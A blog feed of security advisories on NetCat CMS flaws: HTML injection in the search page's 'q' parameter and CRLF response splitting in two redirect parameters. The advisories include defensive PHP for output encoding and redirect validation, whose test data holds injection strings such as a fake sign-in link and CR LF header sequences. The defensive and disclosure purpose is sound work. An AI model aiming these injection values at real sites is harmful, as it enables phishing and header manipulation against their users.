<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html</span></a><br />
<a href="http://seclists.org/fulldisclosure/2015/Apr/13"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/13</span></a><br />
<a href="http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-csrf</span></a><br />
<a href="http://essayjeans.blog.163.com/blog/static/237173074201551435316925/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/237173074201551435316925/</span></a><br />
<a href="https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/</span></a><br />
<a href="http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/234603051201551444917365/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551444917365/</span></a><br />
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/6kbbs-v8-0-csrf</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html</span></a><br />
<a href="https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-csrf</span></a><br />
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-72893439837217018892015-06-14T01:03:00.000-07:002015-06-14T01:03:56.982-07:00OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-i8Nq2ebRUhs/VX0xTF1MPWI/AAAAAAAABDc/Wpvrvx3Mj4c/s1600/netcat_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://2.bp.blogspot.com/-i8Nq2ebRUhs/VX0xTF1MPWI/AAAAAAAABDc/Wpvrvx3Mj4c/s400/netcat_3.png" width="400" /></a></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS 3.12 /catalog/search.php? q Parameter HTML Injection Web Security Vulnerabilities</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 15, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 15, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Input Validation [CWE-20]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 120807</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Access Complexity: Medium</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Authentication: Not required to exploit</span><br style="background-color: #fefdfa; line-height: 18.2000007629395px;" /><span style="background-color: #fefdfa; line-height: 18.2000007629395px;">Impact Type: Allows unauthorized modification</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Discoverer and Reporter: <span style="background-color: white; line-height: 18.2000007629395px;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (</span><a href="https://twitter.com/justqdjing/status/588152703639015424">@justqdjing</a><span style="background-color: white; line-height: 18.2000007629395px;">)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Advisory Details:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Version:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be downloaded from here,</span><br />
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is a local Russian company. "NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">"Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The NetCat web application has a security flaw that can be exploited through HTML injection attacks. Hypertext Markup Language (HTML) injection, also sometimes referred to as virtual defacement, is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user-supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack exploits both a code-based vulnerability and a user's trust.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Several 0-day vulnerabilities in NetCat products have previously been found by other researchers, and NetCat has patched some of them. Web Security Watch is an aggregator of security reports coming from various sources. It aims to provide a single point of tracking for all publicly disclosed security issues that matter. "Its unique tagging system enables you to see a relevant set of tags associated with each security alert for a quick overview of the affected products. What's more, you can now subscribe to an RSS feed containing the specific tags that you are interested in - you will then only receive alerts related to those tags." It has published suggestions, advisories, and solution details related to cyber security vulnerabilities.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The programming flaw occurs at the "/catalog/search.php?" page, in the "&q" parameter.</span><br />
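<span style="font-family: Arial, Helvetica, sans-serif;">The fix for this class of flaw is to encode the value for the HTML context it is written into. The PHP below is an added example, not NetCat code: it shows a search page that reflects "q" unencoded beside the encoded form, with a small regression check; the markup, function names and sample inputs are constructed for illustration.</span><br />

```php
<?php
declare(strict_types=1);

// Added example, not NetCat code. Only the parameter name "q" comes from the
// advisory; the page markup and all function names are hypothetical.

/** "Before": the query is concatenated into the page as-is. */
function render_search_unsafe(string $q): string
{
    return '<h1>Results for ' . $q . '</h1>'
         . '<input type="text" name="q" value="' . $q . '">';
}

/** Encode a value for HTML text and quoted-attribute contexts. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close an attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** "After": every reflection of q is encoded at the point of output. */
function render_search_safe(string $q): string
{
    return '<h1>Results for ' . h($q) . '</h1>'
         . '<input type="text" name="q" value="' . h($q) . '">';
}

/**
 * Regression check: list the element names present in the rendered page
 * that the template itself never writes.
 */
function injected_tags(string $html, array $templateTags): array
{
    preg_match_all('/<\s*([a-z][a-z0-9]*)/i', $html, $m);
    $found = array_unique(array_map('strtolower', $m[1]));
    return array_values(array_diff($found, $templateTags));
}

// --- Constructed inputs; run from the command line with the php CLI ---
$samples = [
    'plain query'        => 'winter boots',
    'injected link'      => '<a href="https://example.invalid/">Session expired, sign in again</a>',
    'attribute breakout' => '"><h2>Site closed</h2>',
];
$template = ['h1', 'input'];   // the only elements the template writes

foreach ($samples as $label => $q) {
    printf(
        "%-20s unsafe: %-8s safe: %s\n",
        $label,
        json_encode(injected_tags(render_search_unsafe($q), $template)),
        json_encode(injected_tags(render_search_safe($q), $template))
    );
}
```

<span style="font-family: Arial, Helvetica, sans-serif;">The unsafe renderer reports the extra "a" and "h2" elements; the encoded renderer reports none for any of the inputs.</span><br />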
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b><br />
<a href="http://seclists.org/fulldisclosure/2015/Apr/37"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/37</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/04/15/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/15/3</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html</span></a><br />
<a href="http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/</span></a><br />
<a href="https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1</span></a><br />
<a href="http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/</span></a><br />
<a href="http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/</span></a><br />
<a href="http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html</span></a><br />
<a href="https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/</span></a><br />
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-120807-netcat-cms-312-html.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-120807.html</span></a><br />
<a href="http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html/</span></a><br />
<a href="http://germancast.blogspot.de/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/2015/06/netcat-html-injection.html</span></a><br />
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/netcat-cms-3-12-html-injection/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-22113821773324850942015-06-14T00:04:00.000-07:002015-06-14T00:08:00.182-07:00OSVDB 119342, 119323 NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-X1zuOgRq3Fg/VX0jsLMACFI/AAAAAAAABDM/m59HtJ8-uw0/s1600/netcat_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://2.bp.blogspot.com/-X1zuOgRq3Fg/VX0jsLMACFI/AAAAAAAABDM/m59HtJ8-uw0/s400/netcat_2.png" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>OSVDB 119342, 119323 </b></span><b><span style="font-family: Arial, Helvetica, sans-serif;">NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: March 07, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: March 07, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF Injection') [CWE-93]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 119342, 119343</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Discoverer and Author: <span style="background-color: white;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/574207452729622528">@justqdjing</a>)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Advisory Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be obtained from here:</span><br />
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is a local Russian company. "NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The NetCat web application has a security bug: it can be exploited by HTTP Response Splitting (CRLF) attacks. This could allow a remote attacker to insert arbitrary HTTP headers, which are included in a response sent to the server. If an application does not properly filter such a request, it could be used to inject additional headers that manipulate cookies, authentication status, or more.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several 0-day vulnerabilities in other similar products have been found by other bug hunters before. NetCat has patched some of them. CXSECurity is a huge collection of information on data communications safety. Its main objective is to inform about errors in various applications. It also publishes suggestions, advisories, and solution details related to CRLF vulnerabilities, as well as cyber intelligence recommendations.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The first flaw is in the "/post.php" page: the "redirect_url" parameter can be abused by adding "%0d%0a%20".</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> The second flaw is in the "redirect.php?" page: the "url" parameter can be abused by adding "%0d%0a%20".</span><br />
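<span style="font-family: Arial, Helvetica, sans-serif;">The "%0d%0a%20" sequence is a CR LF followed by a space, which a header parser can read as a folded continuation line. The block below is an added example, not NetCat code and not part of the original advisory: a hypothetical helper, safe_redirect_target(), that a handler for "redirect_url" or "url" could apply before calling header(); the host allow-list and all sample inputs are constructed.</span><br />

```php
<?php
// Added example: hypothetical helper, not NetCat code.
// Validates a user-supplied redirect target before it is placed in a
// Location header. Function name, allow-list and samples are assumptions.

function safe_redirect_target(string $raw, array $allowedHosts, string $fallback = '/'): string
{
    // PHP has already URL-decoded request parameters once. Decode a few more
    // times so double-encoded sequences (for example %250d%250a) are seen too.
    $value = $raw;
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($value);
        if ($decoded === $value) {
            break;
        }
        $value = $decoded;
    }

    // Reject any control character (CR, LF, NUL, TAB, ...) in the raw or the
    // decoded form. This covers CR LF followed by a space, the pattern the
    // advisory reports.
    if (preg_match('/[\x00-\x1F\x7F]/', $raw . $value)) {
        return $fallback;
    }

    // Site-relative path: exactly one leading slash. "//host" and "/\host"
    // are treated by browsers as absolute URLs, so they are not accepted here.
    if (preg_match('#^/(?![/\\\\])#', $raw)) {
        return $raw;
    }

    // Absolute URL: only http(s) and only hosts on the allow-list.
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback;
    }
    $scheme = strtolower($parts['scheme']);
    $host = strtolower($parts['host']);
    if (!in_array($scheme, ['http', 'https'], true)
        || !in_array($host, $allowedHosts, true)) {
        return $fallback;
    }
    return $raw;
}

// Constructed sample inputs, as the handler would see them after PHP has
// decoded the query string.
$samples = [
    '/news/42',
    "/news/42\r\n X-Test: constructed",          // decoded %0d%0a%20
    '/news/42%0d%0a%20X-Test:%20constructed',    // was double-encoded
    'https://www.example.com/page',
    'https://other.example.net/page',
    '//other.example.net/page',
];

foreach ($samples as $sample) {
    $target = safe_redirect_target($sample, ['www.example.com']);
    printf("%-48s => %s\n", json_encode($sample), $target);
}

// In a real handler the validated value is what reaches header():
// header('Location: ' . safe_redirect_target($_GET['url'] ?? '/', ['www.example.com']));
```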
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>References:</b><br /><a href="http://www.osvdb.org/show/osvdb/119342">http://www.osvdb.org/show/osvdb/119342</a></span><br />
<a href="http://www.osvdb.org/show/osvdb/119343"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.osvdb.org/show/osvdb/119343</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/03/07/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/03/07/3</span></a><br />
<a href="http://seclists.org/fulldisclosure/2015/Mar/36"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Mar/36</span></a><br />
<a href="http://marc.info/?l=full-disclosure&m=142576233403004&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142576233403004&w=4</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676</span></a><br />
<div>
<a href="http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html</span></a><br />
<a href="http://essayjeans.blog.163.com/blog/static/23717307420155142423197/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/23717307420155142423197/</span></a><br />
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html</span></a><br />
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/bugs/netcat-cms-crlf</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/234603051201551423749286/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551423749286/</span></a><br />
<a href="https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/</span></a><br />
<a href="https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-re</span></a><br />
<a href="http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms</span></a><br />
</div>
Posted by essayjeans<br />
<br />
6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities (published 2015-06-13, updated 2015-06-13)<br />
<div class="separator" style="clear: both; text-align: center;">
